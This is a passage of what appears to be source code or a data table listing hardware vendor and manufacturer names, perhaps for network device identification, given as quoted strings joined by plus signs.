"National Products Inc.", + "Rftech", + "Muehlbauer AG", + "Imaging Solutions Group", + "SUNGSAM CO,.Ltd", + "Black Diamond Advanced Technology, LLC", + "SMART High Reliability Solutions, Inc.", + "Comlab Inc.", + "Zhuhai HiFocus Technology Co., Ltd.", + "Panasonic Automotive Systems Asia Pacific(Thailand)Co.,Ltd.", + "RTC Industries, Inc.", + "Intersensor S.r.l.", + "Conlog (Pty) Ltd", + "Billion Electric Co. Ltd.", + "Telefonbau Behnke GmbH", + "Reolink Innovation Limited", + "Alfred Kaercher GmbH & Co KG", + "Lg Cns", + "Pacidal Corporation Ltd.", + "Wächter GmbH Sicherheitssysteme", + "DS International", + "EbV Elektronikbau- und Vertriebs GmbH", + "Dragon Path Technologies Co., Limited", + "Kyynel", + "Viewcooper Corp.", + "COMECER Netherlands", + "Zycoo Co.,Ltd", + "Neoventus Design Group", + "xn systems", + "STA Infinity LLP", + "Budelmann Elektronik GmbH", + "IPEVO corp", + "BYK-Gardner GmbH", + "Millson Custom Solutions Inc.", + "FLECTRON Co., LTD", + "CobaltRay Co., Ltd", + "Carmanah Signs", + "Honest Technology Co., Ltd", + "enimai Inc", + "Traka plc", + "Speedytel technology", + "Volkswagen Group of America", + "Bender GmbH & Co.KG", + "Innometriks Inc", + "Shanghai Magic Mobile Telecommunication Co.Ltd.", + "Elysia Germany GmbH", + "HiveMotion", + "Shenzhen Sunchip Technology Co., Ltd", + "Elektron Technology Uk Limited", + "Samhwa Telecom", + "Cargt Holdings LLC", + "Powerleader Science and Technology Co. Ltd.", + "Accutron Instruments Inc.", + "Tercel technology co.,ltd", + "Sigrand", + "Cyg Sunri Co.,Ltd.", + "MaxTronic International Co., Ltd.", + "Digital Airways", + "Prosyst", + "S.c. Add-Production S.r.l.", + "Beijing BenyWave Technology Co., Ltd.", + "Vievu", + "Nippon Denki Kagaku Co.,LTD", + "eflow Inc. / Smart Device Planning and Development Division", + "TSMART Inc.", + "Step Ahead Innovations Inc.", + "3D Imaging & Simulations Corp", + "Spazio Italia srl", + "NOJA Power Switchgear Pty Ltd", + "Transics", + "Tekpea, Inc.", + "fourtec -Fourier Technologies", + "ADD-Engineering BV", + "Anywave Communication Technologies, Inc.", + "Wildeboer Bauteile GmbH", + "Gigastone Corporation", + "Sonavox Canada Inc", + "Yeonhab Precision Co.,LTD", + "Mct Co., Ltd.", + "Telecor Inc.", + "Digital Telecom Technology Limited", + "Data Modul AG", + "SOYEA Technology Co.,Ltd.", + "Aidc Technology (S) Pte Ltd", + "SanJet Technology Corp.", + "Penetek, Inc", + "A.D.C. GmbH", + "Sweda Informatica Ltda", + "ShenZhen Cando Electronics Co.,Ltd", + "Elatec GmbH", + "MagneMotion, Inc.", + "Shanghai GBCOM Communication Technology Co.,Ltd.", + "Stephen Technologies Co.,Limited", + "Cronoplast S.L.", + "Railtec Systems GmbH", + "Shenzhen NEED technology Ltd.", + "f.robotics acquisitions ltd", + "Laser Light Engines", + "GNTEK Electronics Co.,Ltd.", + "Shenzhen Daystar Technology Co.,ltd", + "Porsche Cars North America", + "Beijing Jinhong Xi-Dian Information Technology Corp.", + "Aartesys Ag", + "Shanghai Guao Electronic Technology Co., Ltd", + "Summer Infant, Inc.", + "WiseSec L.t.d", + "Shenzhen ACT Industrial Co.,Ltd.", + "Amon Inc", + "Kunshan Erlab ductless filtration system Co.,Ltd", + "Sunny Heart Limited", + "GLITEL Stropkov, s.r.o.", + "FONsystem co. ltd.", + "Shenzhen ChuangDao & Perpetual Eternal Technology Co.,Ltd", + "Morion Inc.", + "Power-One", + "EcoTech, Inc.", + "Deqing Dusun Electron CO., LTD", + "YODO Technology Corp. Ltd.", + "Terasic Technologies Inc.", + "WEBER Schraubautomaten GmbH", + "IGRS Engineering Lab Ltd.", + "Enmotus Inc", + "as electronics GmbH", + "GSI Electronics Inc.", + "Akuvox (Xiamen) Networks Co., Ltd", + "Dae Eun Eletronics Co., Ltd", + "Technico Japan Corporation", + "AutoCrib, Inc.", + "Exeltech Solar Products", + "Rinicom Holdings", + "G-WAY Microwave", + "Hoseo Telecom", + "Centro Sicurezza Italia SpA", + "Emko Elektronik San Ve Tic As", + "Zenotech.Co.,Ltd", + "Loenk", + "Gridlink Tech. Co.,Ltd.", + "Cloudium Systems Ltd.", + "Ascent Communication Technology", + "Rancore Technologies Private Limited", + "Frauscher Sensortechnik", + "DEY Storage Systems, Inc.", + "Inesa Electron Co.,Ltd", + "Union Pacific Railroad", + "Milper Ltd", + "Fidus Systems Inc", + "InfoSight Corporation", + "REV Ritter GmbH", + "Symanitron", + "Showa Denki Co.,Ltd.", + "Zaplox AB", + "Passif Semiconductor", + "Sichuan Whayer information industry Co.,LTD", + "SE Controls Asia Pacific Ltd", + "Hippih aps", + "Cortland Research, LLC", + "Physical Graph Corporation", + "EnTek Systems, Inc.", + "FRAMOS GmbH", + "FiveCo", + "PEAK-System Technik", + "Homewins Technology Co.,Ltd.", + "Inform Electronik", + "Definium Technologies", + "Rinstrum Pty Ltd", + "Shinoda Plasma Co., Ltd.", + "PolarLink Technologies, Ltd", + "Cellco Partnership", + "DeviceDesign", + "Beijing LT Honway Technology Co.,Ltd", + "Chromlech", + "Firich Enterprises CO., LTD.", + "VSE valencia smart energy", + "Fibar Group sp. z o.o.", + "Mantis Deposition", + "OxyGuard Internation A/S", + "Iqsim", + "Shenzhen Herotel Tech. Co., Ltd.", + "Suunto Oy", + "Datang Telecom communication terminal (Tianjin) Co., Ltd.", + "Cellient Co., Ltd.", + "Eagle Research Corporation", + "Redwire, LLC", + "AES Corporation", + "Trans New Technology, Inc.", + "Liang Herng Enterprise,Co.Ltd.", + "Blaster Tech", + "Vertu Corporation Limited", + "Wieson Technologies Co., Ltd.", + "Asia Pacific Brands", + "David Electronics Co., LTD.", + "ELIIY Power CO., Ltd.", + "Bayan Audio", + "KST technology", + "Soreel", + "Nanjing Rousing Sci. and Tech. Industrial Co., Ltd", + "Qvis Labs, LLC", + "Arcadia Networks Co. Ltd.", + "Smobile Co., Ltd.", + "t-mac Technologies Ltd", + "S Net Media", + "Strahlenschutz- Entwicklungs- und Ausruestungsgesellschaft mbH", + "EUCAST Co., Ltd.", + "BEG Brueck Electronic GmbH", + "Kai-EE", + "Atlona Inc.", + "SysMik GmbH Dresden", + "Huizhou Qiaoxing Telecommunication Industry Co.,Ltd.", + "Leimac Ltd.", + "Numera, Inc.", + "Gerhard D. Wempe KG", + "Dlogixs Co Ltd", + "Jasmine Systems Inc.", + "Simon-Kaloi Engineering", + "Irt Sa", + "Nicolet Neuro", + "Shenzhen Skyee Optical Fiber Communication Technology Ltd.", + "Glovast Technology Ltd.", + "3D Systems Massachusetts", + "iConnectivity", + "DRS Imaging and Targeting Solutions", + "Pace-O-Matic, Inc.", + "EOC Technology", + "Real Time Logic", + "Pluto inc.", + "Hansung Electronics Co. LTD", + "Magneti Marelli Slovakia s.r.o.", + "Shenzhen Belzon Technology Co.,LTD.", + "Dewav Technology Company", + "Yichun MyEnergy Domain, Inc", + "TTC MARCONI s.r.o.", + "Shenzhen iBaby Labs, Inc.", + "Kohzu Precision Co., Ltd.", + "Labor S.r.L.", + "Shenzhen Ecsino Tecnical Co. Ltd", + "Asct", + "CSE-Servelec Limited", + "Altasec technology corporation", + "Tributary Systems, Inc.", + "Wavelink", + "Great Computer Corporation", + "Tymphany HK Limited", + "Japan Circuit Co.,Ltd", + "Shenzhen Hojy Software Co., Ltd.", + "Linea Research Ltd", + "Itech Instruments Sas", + "Rezolt Corporation", + "Steelcase Inc.", + "SRT Wireless", + "Shanghai Nutshell Electronic Co., Ltd.", + "Fujian Tian Cheng Electron Science & Technical Development Co.,Ltd.", + "Beijing Ereneben Information Technology Co.,Ltd Shenzhen Branch", + "Zhengzhou VCOM Science and Technology Co.,Ltd", + "Hutek Co., Ltd.", + "Aviwest", + "DIRMEIER Schanktechnik GmbH &Co KG", + "I-View Now, LLC.", + "Embedded Technologies s.r.o.", + "ZAO NPK RoTeK", + "Anedo Ltd.", + "Universal Laser Systems, Inc", + "Devlin Electronics Limited", + "STULZ GmbH", + "Broadcast Microwave Services, Inc", + "Advanced Technical Support, Inc.", + "Binatone Telecommunication Pvt. Ltd", + "Uros Oy", + "Raspberry Pi Foundation", + "Astrol Electronic AG", + "Internet Laboratories, Inc.", + "Xapt GmbH", + "Easy Digital Ltd.", + "DinBox Sverige AB", + "Heyrex Limited", + "Alpinion Medical Systems", + "Beijing Haihejinsheng Network Technology Co. Ltd.", + "Heran", + "Fortress Technology Inc", + "DH electronics GmbH", + "Power Idea Technology Limited", + "NL Technologies", + "Manzanita Systems, Inc.", + "Syes srl", + "Genus Power Infrastructures Limited", + "Inhon International Ltd.", + "Shenzhen Eycom Technology Co., Ltd", + "CyWee Group Ltd", + "Kaishun Electronic Technology Co., Ltd. Beijing", + "Epicom S.a", + "Beijing Thomson CITIC Digital Technology Co. LTD.", + "Guangdong Leawin Group Co., Ltd", + "Shenzhen Newabel Electronic Co., Ltd.", + "Tremol Ltd.", + "Link One Co., Ltd.", + "Tamtron Oy", + "Melange Systems Pvt. Ltd.", + "Minieum Networks, Inc", + "Rand McNally", + "Echostreams Innovative Solutions", + "TRUMPF Laser GmbH + Co. KG", + "Omnisense Ltd", + "Color-Chip", + "Advidia", + "AutoHotBox", + "InfiniWing, Inc.", + "Research Products Corporation", + "Brunel University", + "daesung eltec", + "TDSi", + "KOMEG Industrielle Messtechnik GmbH", + "Tdc A/S", + "Yahoo! JAPAN", + "Shenzhen Dajiahao Technology Co.,Ltd", + "Victory Concept Electronics Limited", + "Belden Deutschland GmbH", + "Conrad Electronic SE", + "Advanced Mobile Telecom co.,ltd.", + "Lilee Systems, Ltd.", + "AllDSP GmbH & Co. KG", + "Trex Network LLC", + "IJ Electron CO.,Ltd.", + "Jeda Networks", + "OJSC Ufimskiy Zavod Promsvyaz", + "Metrum Technologies", + "Multi Touch Oy", + "Amper", + "Vity", + "Cybera, Inc.", + "8Devices", + "EDAM information & communications", + "Premier Wireless, Inc.", + "Rlh Industries,Inc.", + "Ctek, Inc.", + "WhizNets Inc.", + "Yunnan KSEC Digital Technology Co.,Ltd.", + "Purple Communications, Inc", + "C2 Development, Inc.", + "ISSC Technologies Corp.", + "Advansee", + "ICM Controls", + "Treehouse Labs", + "Danish Interpretation Systems A/S", + "Nike, Inc.", + "itelio GmbH", + "SolidFire, Inc.", + "Lenbrook Industries Limited", + "Patriot Memory", + "Apex Tool Group GmbH & Co OHG", + "Reciprocal Labs Corp", + "Shenzhen Universal Intellisys Pte Ltd", + "Shinbo Co., Ltd.", + "Beijing GuangXin Technology Co., Ltd", + "JVC KENWOOD Corporation", + "Power Ethernet", + "Adolf Tedsen GmbH & Co. KG", + "BAEKCHUN I&C Co., Ltd.", + "WebSilicon Ltd.", + "Sub10 Systems Ltd", + "Solar Power Technologies, Inc.", + "c-scape", + "eGauge Systems LLC", + "Hes-So", + "ARC Wireless LLC", + "Adanis Inc.", + "AVTrace Ltd.(China)", + "Ricardo Prague, s.r.o.", + "Linkpower Network System Inc Ltd.", + "Viessmann Elektronik GmbH", + "NB Software", + "ProLon", + "Lex Computech Co., Ltd", + "ARIES Embedded GmbH", + "Kunshan JADE Technologies co., Ltd.", + "Tely Labs", + "Tuttnaer LTD", + "Rackspace US, Inc.", + "Good Mind Innovation Co., Ltd.", + "PacketAccess", + "CIAS Elettronica srl", + "Ieee 1905.1", + "Encell Technology, Inc.", + "G-Lab GmbH", + "ShangHai Y&Y Electronics Co., Ltd", + "Mhl, Llc", + "Irlab Ltd.", + "Huria Co.,Ltd.", + "ENERES Co.,Ltd.", + "PROCOM Systems", + "TechFaith Wireless Technology Limited", + "Hamilton Systems", + "taskit GmbH", + "HiTi Digital, Inc.", + "Feitian Xunda(Beijing) Aeronautical Information Technology Co., Ltd.", + "cellon communications technology(shenzhen)Co.,Ltd.", + "DT Research, Inc.", + "ACX GmbH", + "Altenergy Power System,Inc.", + "Lighting Science Group", + "Neomontana Electronics", + "Tron Link Electronics Co., Ltd.", + "Konami Gaming Inc", + "Packet Design, Inc.", + "Costel.,Co.ltd", + "Hangzhou Prevail Optoelectronic Equipment Co.,LTD.", + "Fiberpro Inc.", + "Fe Global Hong Kong Limited", + "LXinstruments GmbH", + "GNH Software India Private Limited", + "Empower RF Systems", + "IOXOS Technologies S.A.", + "Edup International (Hk) Co., Ltd", + "Jireh Energy Tech., Ltd.", + "modas GmbH", + "Chauvin Arnoux", + "Airoha Technology Corp.,", + "Beijing ECHO Technologies Co.,Ltd", + "SCR Engineers Ltd.", + "Trevil srl", + "Sotera Wireless", + "Ness Corporation", + "Cjsc Nii Stt", + "Pan Studios Co.,Ltd.", + "Linktop Technology Co., LTD", + "Cosesy ApS", + "Zeo", + "ShenZhen ShiHua Technology CO.,LTD", + "GH Technologies", + "NET New Electronic Technology GmbH", + "Autonics Corporation", + "Nabtesco Corporation", + "Marini Impianti Industriali s.r.l.", + "Rsi Video Technologies", + "BASIC Co.,Ltd.", + "Digitalwatt", + "Thing-talk Wireless Communication Technologies Corporation Limited", + "Compressor Controls Corp", + "Ellips B.V.", + "Cadac Holdings Ltd", + "Haivision Network Video", + "Korea CNO Tech Co., Ltd", + "Ensequence, Inc.", + "Shenzhen Cultraview Digital Technology Co.,Ltd Shanghai Branch", + "Nuvyyo Inc", + "Funkwerk plettac electronic GmbH", + "Ensemble Designs, Inc.", + "Seibu Electric Co.,", + "udworks Co., Ltd.", + "Metrological Group BV", + "Messoa Technologies Inc.", + "CRU-Dataport", + "Beijing ZhongHuaHun Network Information center", + "Galleon Embedded Computing", + "Icon Time Systems", + "TEKTELIC Communications Inc.", + "Senselogix Ltd", + "Jurumani Solutions", + "Herrmann Ultraschalltechnik GmbH & Co. Kg", + "Benu Video, Inc.", + "Seohwa Telecom", + "Optex-Fa Co.,Ltd.", + "Bamboo Entertainment Corporation", + "I-Lax Electronics Inc.", + "Atlinks", + "Rf Window Co., Ltd.", + "2 Save Energy Ltd", + "Vieworks", + "Accordance Systems Inc.", + "Dream Ware Inc.", + "Sunlit System Technology Corp", + "Avvasi Inc.", + "LabJack", + "HangZhou QiYang Technology Co.,Ltd.", + "Xts Corp", + "Neuberger Gebäudeautomation GmbH", + "FlatFrog Laboratories AB", + "Creowave Oy", + "Dongnian Networks Inc.", + "Abbott Point of Care", + "HME Co., Ltd.", + "Nanotron Technologies GmbH", + "Max Communication GmbH", + "CAx soft GmbH", + "S. Siedle & Sohne", + "SafeTone Technology Co.,Ltd", + "Dycon Limited", + "AREVA NP GmbH", + "ESG Solutions", + "Spectra Embedded Systems", + "Globalstar Inc.", + "Zhejiang Boxsam Electronic Co.,Ltd", + "Favite Inc.", + "Hug-Witschi Ag", + "Digital Projection Ltd", + "Accelink Technologies Co.,Ltd.", + "Skyworth Wireless Technology Ltd.", + "acromate, Inc.", + "Touch Networks", + "Fleetwood Group Inc.", + "BITwave Pte Ltd", + "Smith Myers Communications Ltd.", + "Janteq Corp", + "YWire Technologies, Inc.", + "JAG Jakob AG", + "Secure Meters (UK) Limited", + "OOO InProMedia", + "Aliwei Communications, Inc", + "Shanghai Railway Communication Factory", + "Enspert Inc", + "TMY Co., Ltd.", + "LeddarTech Inc.", + "Slican Sp. z o.o.", + "iD corporation", + "Pandachip Limited", + "Xi'an Jizhong Digital Communication Co.,Ltd", + "Beijing Skyway Technologies Co.,Ltd", + "Wuhan Zhongyuan Huadian Science & Technology Co.,", + "Macro Image Technology, Inc.", + "SmarteBuilding", + "Shenzhen Hexicom Technology Co., Ltd.", + "FIRS Technologies(Shenzhen) Co., Ltd", + "Phorm", + "Transcend Communication Beijing Co.,Ltd.", + "WYMA Tecnologia", + "LG-Ericsson Co.,Ltd.", + "Thermo Fisher Scientific P.O.A.", + "Hotel Technology Next Generation", + "KUNBUS GmbH", + "NetworkAccountant, Inc.", + "QRS Music Technologies, Inc.", + "Z3 Technology", + "Motorola Inc Business Light Radios", + "Niceway CNC Technology Co.,Ltd.Hunan Province", + "IntelliVoice Co.,Ltd.", + "Renesas Electronics Corporation", + "Creative Product Design Pty. Ltd.", + "Ionics Technology Me Ltda", + "SynapSense Corporation", + "pomdevices, LLC", + "Kyoto University", + "Drivven, Inc.", + "Shanhai GBCOM Communication Technology Co. Ltd", + "01Db-Metravib", + "Memjet Inc.", + "Atlas Elektronik UK Limited", + "SDTEC Co., Ltd.", + "Santur Corporation", + "Summit Technology Group", + "Entis Co., Ltd.", + "Shanghai Qihui Telecom Technology Co., LTD", + "Fci Usa Llc", + "Albahith Technologies", + "Additech, Inc.", + "C3po S.a.", + "Gvi Security Inc.", + "HEXIUM Technical Development Co., Ltd.", + "Itl, Llc", + "Jensen Scandinavia AS", + "Patech", + "GEMUE Gebr. Mueller Apparatebau", + "Server Racks Australia Pty Ltd", + "GridCentric Inc.", + "Aximum Produits Electroniques", + "CS Services Co.,Ltd.", + "Mitsubishi Heavy Industries Mechatronics Systems,Ltd.", + "SCL Elements", + "RaonThink Inc.", + "Clay Paky Spa", + "Danfoss Solar Inverters", + "Sewoo Tech Co., Ltd", + "Cyber-Rain, Inc.", + "BlueRadios, Inc.", + "Secure Electrans Ltd", + "Shenzhen Sea Star Technology Co.,Ltd", + "Altec Lansing Llc", + "JW Electronics Co., Ltd.", + "Product Creation Studio", + "Alstom Strongwish (Shenzhen) Co., Ltd.", + "Ikor Metering", + "Dynamode Group", + "Intron Scientific co., ltd.", + "DVN(Shanghai)Ltd.", + "KLINFO Corp", + "INAT GmbH", + "KE Knestel Elektronik GmbH", + "Displaire Corporation", + "Radios, Inc.", + "Damall Technologies SAS", + "WONWOO Engineering Co., Ltd", + "Xcellen", + "Siemens AG, Healthcare Sector", + "General Electric Consumer and Industrial", + "Guangzhou Comet Technology Development Co.Ltd", + "Hangzhou GoTo technology Co.Ltd", + "Fagor Electrónica", + "Forworld Electronics Ltd.", + "JayBird LLC", + "IRCO Sistemas de Telecomunicación S.A.", + "Lamprey Networks, Inc.", + "MPB Communications Inc.", + "Shanghai VLC Technologies Ltd. Co.", + "TC Communications", + "Lineeye Co., Ltd", + "ShopperTrak RCT Corporation", + "StorSimple Inc", + "PSS Belgium N.V.", + "CRemote, LLC", + "E-Fuel Corporation", + "Axxana(israel) ltd", + "BizLink (Kunshan) Co.,Ltd", + "Coby", + "Cudo Communication Co., Ltd.", + "ViewSonic Mobile China Limited", + "AGAiT Technology Corporation", + "Thamway Co.,Ltd.", + "Neuron Robotics", + "Diffon Corporation", + "Teraon", + "BnCOM Co.,Ltd", + "Ams Neve Ltd", + "Hay Systems Ltd", + "SRD Innovations Inc.", + "Repotec Co., Ltd.", + "VNL Europe AB", + "BlueBit Ltd.", + "Detracom", + "East Best Co., Ltd.", + "DQ Technology Inc.", + "Imago Group", + "Delphin Technology AG", + "The Goldman Sachs Group, Inc.", + "IDN Telecom, Inc.", + "Xagyl Communications", + "Comba Telecom Systems (China) Ltd.", + "New-Sol Com", + "LENUS Co., Ltd.", + "GiK mbH", + "Xia Men UnionCore Technology LTD.", + "Protect America, Inc.", + "DishTV NZ Ltd", + "Chengdu Volans Technology CO.,LTD", + "Akib Systems Taiwan, INC", + "Nivetti Systems Pvt. Ltd.", + "Military Communication Institute", + "cTrixs International GmbH.", + "Cheerchip Electronic Technology (ShangHai) Co., Ltd.", + "Fival Science & Technology Co.,Ltd.", + "Fdi Matelec", + "Universal Media Corporation /Slovakia/ s.r.o.", + "Ionics EMS Inc.", + "Proventix Systems, Inc.", + "ShenZhen Temobi Science&Tech Development Co.,Ltd", + "Ory Solucoes em Comercio de Informatica Ltda.", + "Kozumi USA Corp.", + "Nordiag ASA", + "BandRich Inc.", + "S.E.M. srl", + "Interactive Intelligence", + "Ford Motor Company", + "Shanghai LUSTER Teraband photonic Co., Ltd.", + "Trixell", + "LanPro Inc", + "MTA SpA", + "Quantenna Communcations, Inc.", + "Kisan System", + "SIL3 Pty.Ltd", + "Xia Men Joyatech Co., Ltd.", + "Digitec Systems", + "Bluetechnix GmbH", + "OEM Worldwide", + "Engel Axil S.L.", + "Linn Products Ltd", + "Dataram", + "ISGUS GmbH", + "Cop Security System Corp.", + "Wongs Electronics Co. Ltd.", + "Senscient Ltd", + "I Do It", + "Euphonic Technologies, Inc.", + "COMMidt AS", + "Ooo Npp Ekra", + "netTALK.com, Inc.", + "DVS Korea, Co., Ltd", + "Reutech Radar Systems (PTY) Ltd", + "Avtex Ltd", + "The Kroger Co.", + "Eastern Asia Technology Limited", + "Skylane Optics", + "Esus Elektronik San. Ve Dis. Tic. Ltd. Sti.", + "Walnut Media Network", + "EuroDesign embedded technologies GmbH", + "COMFILE Technology", + "Kontron (BeiJing) Technology Co.,Ltd", + "Cutera Inc", + "Wireless Cables Inc.", + "Cypress Solutions Inc", + "Telecom FM", + "Nawoo Korea Corp.", + "CAMCO Produktions- und Vertriebs-GmbH für Beschallungs- und Beleuchtungsanlagen", + "Neli Technologies", + "KUNIMI MEDIA DEVICE Co., Ltd.", + "ST Electronics (Info-Security) Pte Ltd", + "Dantherm Power", + "Pixel8 Networks", + "Tantalus Systems Corp.", + "Syphan Technologies Ltd", + "Aetas Systems Inc.", + "Entourage Systems, Inc.", + "Energy, Inc.", + "On-Ramp Wireless, Inc.", + "eks Engel GmbH & Co. KG", + "Quasar Technologies, Inc.", + "Wittenstein Ag", + "Vitality, Inc.", + "OCP Inc.", + "DSA Encore, LLC", + "SHARETRONIC Group LTD", + "IlSung Precision", + "Willow Garage, Inc.", + "QUALICA Inc.", + "Exeltech Inc", + "Inscape Data Corporation", + "Hager Electro SAS", + "ESCATRONIC GmbH", + "Coulomb Technologies", + "Bimeng Comunication System Co. Ltd", + "NDS Surgical Imaging", + "Innovar Systems Limited", + "Solid Year Co., Ltd.", + "AOC International (Europe) GmbH", + "Hybus Co., Ltd.", + "Motorola, Broadband Solutions Group", + "Bang and Olufsen Medicom a/s", + "Initra d.o.o.", + "Solartron Metrology Ltd", + "SpiderCloud Wireless, Inc", + "Perceptron Inc", + "Hittite Microwave Corporation", + "Knapp Logistik Automation GmbH", + "iWOW Communications Pte Ltd", + "EnergyICT", + "FU YI CHENG Technology Co., Ltd.", + "TAP.tv", + "Weinzierl Engineering GmbH", + "Axona Limited", + "S.a.a.a.", + "Hivision Co.,ltd", + "Hokkaido Electronics Corporation", + "Any Use", + "The Toro Company", + "Cavena Image Products AB", + "Benein, Inc", + "Trg", + "AirLink WiFi Networking Corp.", + "IP Datatel, LLC.", + "Biodevices, SA", + "Masternaut", + "Behind The Set, LLC", + "Shenzhen Full-join Technology Co.,Ltd", + "Uniloc USA Inc.", + "Xmark Corporation", + "New Concepts Development Corp.", + "Antipode", + "AVSystem sp. z o. o.", + "LogMeIn, Inc.", + "COMXION Technology Inc.", + "LITE-ON IT Corporation", + "Advanced Illumination", + "Cayee Computer Ltd.", + "Syracuse Research Corporation", + "Senticare", + "Ird A/S", + "eonas IT-Beratung und -Entwicklung GmbH", + "Shouyo Electronics CO., LTD", + "Alcon Telecommunications Co., Ltd.", + "More Star Industrial Group Limited", + "ResMed Ltd", + "Xembedded, Inc.", + "Elster Gmbh", + "Neotion", + "Ktc Ab", + "Tem Ag", + "OJ-Electronics A/S", + "Unigen Corporation", + "Silicon Micro Sensors GmbH", + "C-Matic Systems Ltd", + "ITF Co., Ltd.", + "TSI Power Corporation", + "ZORT Labs, LLC.", + "Atlantic Software Technologies S.r.L.", + "TAMUZ Monitors", + "Shenzhen GST Security and Safety Technology Limited", + "Vigil Health Solutions Inc.", + "Photon Europe GmbH", + "Kensington Computer Products Group", + "GBS Laboratories LLC", + "Vanderlande APC inc.", + "Shenzhen GIEC Electronics Co., Ltd.", + "Gowell Electronic Limited", + "Digicable Network India Pvt. Ltd.", + "Fortex Industrial Ltd.", + "Hub-Tech", + "ComWorth Co., Ltd.", + "Sensys Traffic AB", + "JDSU France SAS", + "Ouman Oy", + "Lenord, Bauer & Co GmbH", + "Ye Data Inc.", + "Apogee Labs, Inc.", + "TimeKeeping Systems, Inc.", + "Audio Precision", + "Airtech Technologies, Inc.", + "RATIO Entwicklungen GmbH", + "ZOLL Lifecor Corporation", + "Raylase Ag", + "SerialTek LLC", + "Informatics Services Corporation", + "TECNOALARM S.r.l.", + "Enseo, Inc.", + "Si14 SpA", + "Tutus Data AB", + "Pci Corporation", + "Schaffner Deutschland GmbH", + "SMT&C Co., Ltd.", + "Aksys Networks Inc", + "Cambridge Visual Networks Ltd", + "Videofon MV", + "Baoding Galaxy Electronic Technology Co.,Ltd", + "Bastec AB", + "YMax Telecom Ltd.", + "Wesung TNC Co., Ltd.", + "IHSE GmbH", + "Millinet Co., Ltd.", + "Hantle System Co., Ltd.", + "Honeywld Technology Corp.", + "Sekonic Corporation", + "Automation Products Group Inc.", + "Odva", + "Yournet Inc.", + "AppTech, Inc.", + "Galvanic Ltd", + "Consilium AB", + "Chip-pro Ltd.", + "KUK JE TONG SHIN Co.,LTD", + "Shenzhen Torch Equipment Co., Ltd.", + "Advanced Knowledge Associates", + "Power Monitors, Inc.", + "Athena Tech, Inc.", + "Padtec S/A", + "Wiscom System Co.,Ltd", + "China Daheng Group ,Inc.", + "Tecan Systems Inc.", + "In-Circuit GmbH", + "Cepheid", + "TechNexion Ltd.", + "Embedded Wireless GmbH", + "Eigen Development", + "GiBahn Media", + "Chi Lin Technology Co., Ltd.", + "NextIO, Inc.", + "Taseon, Inc.", + "EVGA Corporation", + "Kyocera Wireless Corp.", + "Paltronics", + "WiMate Technologies Corp.", + "SmartShare Systems", + "A10 Networks", + "Vtech Engineering Corporation", + "Planar Llc", + "Blatand GmbH", + "Ingenieurbuero Stark GmbH und Ko. KG", + "Control Express Finland Oy", + "Shanghai Bellmann Digital Source Co.,Ltd.", + "Gigle Semiconductor", + "Shenzhen Advanced Video Info-Tech Co., Ltd.", + "Hitek Automated Inc.", + "Digital United Inc.", + "Alentec & Orion AB", + "Astec Technology Co., Ltd", + "NexG", + "Intelligent Digital Services GmbH", + "Risco Ltd", + "Servimat", + "L-3 Communications Display Systems", + "Japan Kyastem Co., Ltd", + "Federal State Unitary Enterprise Industrial UnionElectropribor", + "Phonik Innovation Co.,LTD", + "Kronback Tracers", + "ConMed Linvatec", + "Albentia Systems S.A.", + "Entes Elektronik", + "Air2App", + "R.I.CO. S.r.l.", + "Infra Access Korea Co., Ltd.", + "Lagotek Corporation", + "Ever Sparkle Technologies Ltd", + "TAG Heuer SA", + "Armadeus Systems", + "E-Senza Technologies GmbH", + "TrellisWare Technologies, Inc.", + "COWON SYSTEMS,Inc.", + "Bally Wulff Entertainment GmbH", + "ALCOMA, spol. s r.o.", + "Celio Corp", + "Bluelight Technology Inc.", + "Fidustron INC", + "Medium Link System Technology CO., LTD,", + "Shenzhen First Mile Communications Ltd", + "IT R&D Center", + "Battistoni Research", + "Microwave Communication & Component, Inc.", + "Ksic", + "Netflix, Inc.", + "Trimm, Inc.", + "Intego Systems, Inc.", + "RIKOR TV, Ltd", + "Audinate Pty L", + "Grid Net, Inc.", + "CryptoMetrics", + "Stim", + "Hokkaido Electric Engineering Co.,Ltd.", + "Sinotech Engineering Consultants, Inc. Geotechnical Enginee", + "Navionics Research Inc., dba SCADAmetrics", + "Ayon Cyber Security, Inc", + "SwissQual License AG", + "Heng Yu Electronic Manufacturing Company Limited", + "Elelux International Ltd", + "Tianjin China-Silicon Microelectronics Co., Ltd.", + "Confidant International LLC", + "ABE Elettronica S.p.A.", + "Grid Connect Inc.", + "Adaptive Recognition Hungary, Inc", + "TechTrex Inc", + "VigTech Labs Sdn Bhd", + "Beijing Huahuan Eletronics Co.,Ltd", + "CQ Inc", + "S&O Electronics (Malaysia) Sdn. Bhd.", + "Sunnic Technology & Merchandise INC.", + "Inter-M Corporation", + "Agapha Technology co., Ltd.", + "Radioscape PLC", + "OverSpeed SARL", + "QuantumVision Corporation", + "Environnement Sa", + "MBS Electronic Systems GmbH", + "Cowbell Engineering Co., Ltd.", + "Part II Research, Inc.", + "Ezze Mobile Tech., Inc.", + "CBC Co., Ltd", + "Davis Instruments, Inc.", + "Cooper Lighting Solutions", + "Napera Networks Inc", + "Genew Technologies", + "STL Solution Co.,Ltd.", + "Cohesive Financial Technologies LLC", + "Zygo Corporation", + "Liecthi AG", + "Linkwise Technology Pte Ltd", + "VerScient, Inc.", + "Qniq Technology Corp.", + "Custom Computer Services, Inc.", + "Waves Audio LTD", + "MJ Innovations Ltd.", + "Leica Microsystems", + "ASTON France", + "Chubb Electronic Security Systems Ltd", + "Petrotest Instruments", + "Seon Design Inc.", + "Core Digital Electronics Co., Ltd", + "Formosa Wireless Systems Corp.", + "CLB Benelux", + "Center Communication Systems GmbH", + "Mobile XP Technology Co., LTD", + "Huey Chiao International Co., Ltd.", + "iNEWiT NV", + "Cwlinux Limited", + "Entry Point, LLC", + "Dignsys Inc.", + "Kyohritsu Electronic Industry Co., Ltd.", + "Vr Ag", + "AhnLab,Inc.", + "TELENOT ELECTRONIC GmbH", + "Tellink Sistemas de Telecomunicación S.L.", + "iPhotonix LLC", + "Flexit Group GmbH", + "Calyptech Pty Ltd", + "KS System GmbH", + "Apollo Fire Detectors Ltd", + "FMC Kongsberg Subsea AS", + "ICOP Digital", + "Condalo GmbH", + "Alta Heights Technology Corp.", + "Curtiss Wright Controls Embedded Computing", + "Navigon Ag", + "Semindia Systems Private Limited", + "Hurco Automation Ltd.", + "Sogestmatic", + "Kelvin Hughes Ltd", + "Dataupia Corporation", + "Taiwan Semiconductor Co., Ltd.", + "MAN Energy Solutions", + "JMicron Technology Corp.", + "Efkon Ag", + "EMZA Visual Sense Ltd.", + "Powerwave Technologies Sweden AB", + "Sennheiser electronic GmbH & Co. KG", + "Pempek Systems 